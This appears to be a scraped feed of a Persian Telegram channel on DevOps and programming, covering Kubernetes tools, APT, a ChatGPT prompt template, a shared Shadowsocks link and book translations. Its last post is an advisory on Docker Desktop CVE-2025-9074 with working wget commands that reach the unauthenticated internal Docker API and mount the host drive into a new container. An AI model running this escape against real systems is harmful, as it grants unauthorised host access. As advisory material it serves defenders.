"AI text detection: how to validate?"
می شه
می کنه
می رم
می+" "+ any word
😅😄😄
می شه
می کنه
می رم
می+" "+ any word
😅😄😄
😁3😘1
سلام رفقا 👋
نتایج کنکور اعلام شده، اگر دوستی قصد انتخاب رشته مهندسی کامپیوتر داره، خوشحال میشم در این رابطه کمکش کنم (هزینهای دریافت نمیشه)
اگر دوست داشتین به آیدی من پیام بدین:
@TheBlitzschnell
نتایج کنکور اعلام شده، اگر دوستی قصد انتخاب رشته مهندسی کامپیوتر داره، خوشحال میشم در این رابطه کمکش کنم (هزینهای دریافت نمیشه)
اگر دوست داشتین به آیدی من پیام بدین:
@TheBlitzschnell
❤6🔥1👏1🤝1😘1
Byteforge / بایــت فورج 🛸
https://github.com/unxsist/jet-pilot #DevOps #byteforge @byteforge_chan 🛸
کلاینتی برای کوبرنتیز
برای یوزر هایی که مالتی کلاستر کار میکنند
نسبت به k9s کار هارو با یه محیط گرافیکیgui
جلو میبری هدف از اولشم همین بوده
برای یوزر هایی که مالتی کلاستر کار میکنند
نسبت به k9s کار هارو با یه محیط گرافیکیgui
جلو میبری هدف از اولشم همین بوده
🔥2👍1😘1
نگارش ۳٫۱ ابزار بستهبندی پیشرفته APT وارد مخازن دبیان شد.
یکی از مهمترین ویژگیهای سمت کاربر این نگارش اضافه شدن گزینهٔ why و why-not برای پرسوجوی دلیل نصب بودن یا نبودن یه بسته است.
یکی از مهمترین ویژگیهای سمت کاربر این نگارش اضافه شدن گزینهٔ why و why-not برای پرسوجوی دلیل نصب بودن یا نبودن یه بسته است.
#linux
#debian
#byteforge
@byteforge_chan 🛸
🔥2😘1
پاول دوروف در اقدامی گسترده، شمار زیادی از کانالهای کلاهبرداری رمزارزی را با برچسب «کلاهبرداری / SCAM» مشخص کرد.
#news
#telegram
#byteforge
@byteforge_chan 🛸
❤11🔥5😘1
gen by chatgpt 5.0 v
پرامپت تصویر بالا که میتونید برای محیط های مختلف کاستومایز کنید به درخواست خودتون .
پرامپت تصویر بالا که میتونید برای محیط های مختلف کاستومایز کنید به درخواست خودتون .
یک تصویر سهبعدی رندر شده دیجیتال که یک [نقش/عنوان شغلی] را نشان میدهد.
او داخل یک [نوع محفظه/شکل هندسی] با [ویژگیهای ظاهری محفظه] نشسته است.
شخص با [ظاهر/ویژگیهای فردی: ریش، عینک، لباس] روی یک [نوع لپتاپ/رنگ لپتاپ] تمرکز کرده است.
پشت او [نوع تجهیزات: رکهای سرور/لوگوها/پنلها] قرار دارند و روی دیوار آیکونهای [فناوریها یا ابزارها: Docker، Kubernetes، DevOps، Terraform و غیره] دیده میشوند.
روی میز او [وسایل روی میز: فنجان قهوه، تلفن همراه، گیاه کوچک، کابلها] قرار دارد.
روی جلوی میز کلمهی [متن دلخواه مثل DevOps] همراه با [نماد یا لوگوی خاص مثل ∞ یا آیکون معروف دواپس] حک شده است.
[نوع نورپردازی/رنگبندی فضا: آبی تیره، نئون، نور ملایم] حالوهوای [حس کلی: آرام، مدرن، تکنولوژیک، آیندهگرا] را القا میکند.
📌 این قالب کاملاً ماژولار و یونیکه؛ هر بار فقط کافیه متغیرهای داخل [ ] رو تغییر بدی تا برای هر شغل یا سناریوی دیگه خروجی سفارشی بگیری.
#ai
#chatgpt
#byteforge
@byteforge_chan 🛸
❤🔥6😘1
Byteforge / بایــت فورج 🛸
gen by chatgpt 5.0 v پرامپت تصویر بالا که میتونید برای محیط های مختلف کاستومایز کنید به درخواست خودتون . یک تصویر سهبعدی رندر شده دیجیتال که یک [نقش/عنوان شغلی] را نشان میدهد. او داخل یک [نوع محفظه/شکل هندسی] با [ویژگیهای ظاهری محفظه] نشسته است. شخص…
پرامپت تولید عکس بالا قرار گرفت
🤝4😘1
ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01
شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray
Byteforge / بایــت فورج 🛸
ss://Y2hhY2hhMjAtaWV0Zi1wb2x5MTMwNTphOEtLNGVnaVRaZmRJNGtxR1Y3eVpy@switcher-nick-croquet.freesocks.work:443/?outline=1&prefix=%16%03%01%00%C2%A8%01%01 شدوساکس ۹۰ روزه قابل استفاده بر روی تمامی کلاینت های v2ray
🌐 freesocks.org/docs/setup/
دریافت از لینک زیر
freesocks.org
Setup & Get Connected
This page tells you how to install and setup the Outline Client app.
❤🔥3
📘 Task Programming in C# and .NET
یه خبر خوب! 🎉
شروع کردم به ترجمهی این کتاب. که به صورت تخصصی وارد دنیای برنامهنویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️
🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian
یه خبر خوب! 🎉
شروع کردم به ترجمهی این کتاب. که به صورت تخصصی وارد دنیای برنامهنویسی Task و async/await در #C و .NET میشه و منبع خیلی خوبی برای درک عمیق این مفاهیمه.
دو فصل هم ترجمه شده
لطفاً حمایت کنید.❤️
🔗 https://github.com/hheydarian/task-programming-in-csharp-dotnet-persian
GitHub
GitHub - hheydarian/task-programming-in-csharp-dotnet-persian: Persian translation of "Task Programming in C# and .NET" by Vaskaran…
Persian translation of "Task Programming in C# and .NET" by Vaskaran Sarcar. - hheydarian/task-programming-in-csharp-dotnet-persian
❤🔥5🔥3🍾1
Forwarded from جادی | Jadi
چند وقت پیش دوستی با اجرا کردن یه ابزار مرسوم، فایلهای سرگردانی رو روی سرور من پیدا کرد. توی این ویدئو مفهوم رو توضیح می دم و ابزار رو نشون می دم.
https://youtu.be/pBY6Chqqy_c
https://youtu.be/pBY6Chqqy_c
YouTube
چطوری هک شدم؟ کشف مسیرهای مخفی روی هاست سایتها با ابزار فازینگ
گاهی مدیر سیستمها یا حتی برنامه نویسها با تکیه به اینکه «خب کسی که نمی دونه این ایجاست» فایل ها یا حتی مسیرهایی روی سرورهاشون می ذارن که اگر کسی بدونه، بهتره که نباشن (: در این موارد فازینگ به هکرها کمک می کنه که این دیتاها رو پیدا کنن. البته فازینگ به…
🔥3
https://github.com/hemansadeghi/Termify.git
ابذار کاربردی اضافه کنید رفقا 😁❤️
ابذار کاربردی اضافه کنید رفقا 😁❤️
#linux
#cli
#byteforge
@byteforge_chan 🛸
GitHub
GitHub - hemansadeghi/Termify: A curated and ever-growing list of awesome terminal-based CLI tools for developers, sysadmins, and…
A curated and ever-growing list of awesome terminal-based CLI tools for developers, sysadmins, and power users. Clean, fast, and productive. - hemansadeghi/Termify
❤🔥5
Forwarded from Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه میندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید دیدید برید اونو سرچ کنید یاد بگیرید
github.com/inancgumus/learngo
@Linuxor
github.com/inancgumus/learngo
@Linuxor
🔥3👏2
Linuxor ?
برای یادگیری زبان گو، اگه قبلا برنامه نویسی با زبان دیگه کردی حتما لازم نیست که بشینی ویدیو یا کتاب بخونی این کارتو راه میندازه توی هر دارکتوریش/فولدرش چند تا مثال از بخش های مختلف گو رو زده، کداش رو دونه دونه بردارید روی سیستم خودتون ران کنید هرجا چیز جدید…
رفقای دواپسی گلم 🙋♂
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده
میدونم که بیشترتون با پایتون راحتید
ولی بلد بودن Go واقعا حالت یه فیچر با ارزش افزوده برای یه پروداکت رو داره برای شخص شما 👌
به جمله بندی منم گیر ندین برید گو یاد بگیرید مخصوصا بچه هایی که شاید وارد شرکت های cloud native بشن در آینده
❤5🔥2
Forwarded from Hamed
📕 Clean Code in C#
یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد.
همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه میده. ممنون از حمایتتون! ❤️
https://github.com/hheydarian/clean-code-in-csharp-persian
یک خبر عالی! 🥳
ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد.
همراهی و نظرات انگیزشی شما کلی انرژی و دلگرمی به این پروژه میده. ممنون از حمایتتون! ❤️
https://github.com/hheydarian/clean-code-in-csharp-persian
GitHub
GitHub - hheydarian/clean-code-in-csharp-persian: Persian translation of the book Clean Code in C# by Jason Alls
Persian translation of the book Clean Code in C# by Jason Alls - hheydarian/clean-code-in-csharp-persian
🔥3❤1
Byteforge / بایــت فورج 🛸
📕 Clean Code in C# یک خبر عالی! 🥳 ترجمه فارسی کامل کتاب #Clean Code in C نوشته Jason Alls بهصورت رسمی آماده شد! این کتاب یکی از منابع فوقالعاده برای یادگیری اصول کدنویسی تمیز، Refactoring و ارتقای کیفیت نرمافزار در #C بهحساب میاد. همراهی و نظرات انگیزشی…
مثله همیشه حامد عزیز ی حرکت خفن زده ی سر به ریپو بزنید ❤️👌
Forwarded from RandRng
اگر از Docker Desktop استفاده میکنید حتما باید آپدیتش کنید؛ یک vulnerability سطح بالا توی نحوه پیادهسازی داره (آپدیت آخر مشکل رو حل کرده)
https://nvd.nist.gov/vuln/detail/CVE-2025-9074
این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.
توی گزارش اصلی فقط ویندوز گفته شده (نمیدونم مک هم داره یا نه)
https://nvd.nist.gov/vuln/detail/CVE-2025-9074
این مورد باعث میشه با ۲ خط کد بشه تمام موارد امنیتی رو دور زد و به سیستم عامل اصلی دسترسی گرفت.
توی گزارش اصلی فقط ویندوز گفته شده (نمیدونم مک هم داره یا نه)
👏4
Forwarded from Xero Notes
🐋 آسیبپذیری CVE-2025-9074 در Docker Desktop
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
یک کانتینر جدید با دستور
📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
اخیرا از آسیبپذیری جدیدی در Docker Desktop با شناسه CVE-2025-9074 کشف شده است که به مهاجمین این امکان را میدهد تا از داخل کانتینرها به سیستم میزبان دسترسی پیدا کنند. این آسیبپذیری به دلیل دسترسی بدون احراز هویت به API داخلی Docker بوده و به راحتی میتوان با استفاده از یک درخواست HTTP ساده، دسترسی کامل به سیستم میزبان پیدا کرد.
💥 این آسیبپذیری چطور به وجود آمده است؟
در Docker Desktop نسخههای قبل از ۴.۴۴.۳، هر کانتینری میتوانست به API Docker با آدرس h
ttp://192.168.65.7:2375 دسترسی داشته باشد بدون اینکه نیاز به احراز هویت برای استفاده از آن داشته باشد.. با استفاده از این دسترسی، مهاجم میتواند یک کانتینر جدید با دسترسیهای ویژه راهاندازی کرده و در نهایت به فولدر C: در سیستم میزبان دسترسی پیدا کند. لازم به ذکر است که این آسیب پذیری در نسخه مک نیز قابل استفاده است و امکان دسترسی روت را برای مهاجم فراهم میکند.💠 نمونه کد برای آزمایش آسیبپذیری
ابتدا یک کانتینر Alpine بسازید.
docker run -it alpine /bin/sh
سپس با استفاده از پیلود زیر، آسیبپذیری را تست کنید.
wget --header='Content-Type: application/json' \
--post-data='{"Image":"alpine","Cmd":["sh","-c","echo pwned > /mnt/host_root/pwn.txt"],"HostConfig":{"Binds":["//c/host_root:/mnt/host_root"]}}' \
-O - http://192.168.65.7:2375/containers/create > create.json
cid=$(cut -d'"' -f4 create.json)
wget --post-data='' -O - http://192.168.65.7:2375/containers/$cid/start
این پیلود با ارسال یک درخواست HTTP به آدرس زیر،
192.168.65.7:2375/containers/create
یک کانتینر جدید با دستور
echo pwned > /mnt/host_root/pwn.txt میسازد و با استفاده از قابلیت Volume در Docker، مسیر C:/host_root را به mnt/host_root/ در داخل کانتینر مپ میکند.📊 امتیاز CVSS
این آسیبپذیری دارای امتیاز CVSS 9.3 (بحرانی) است و در وکتور CVSS زیر قرار میگیرد:
CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
✅ راهحل
این آسیب پذیری در نسخه Docker Desktop ۴.۴۴.۳ برطرف شده است.
🔗 https://nvd.nist.gov/vuln/detail/CVE-2025-9074
#DockerSecurity #CVE #DockerDesktop
@Xero_Notes
👍1🔥1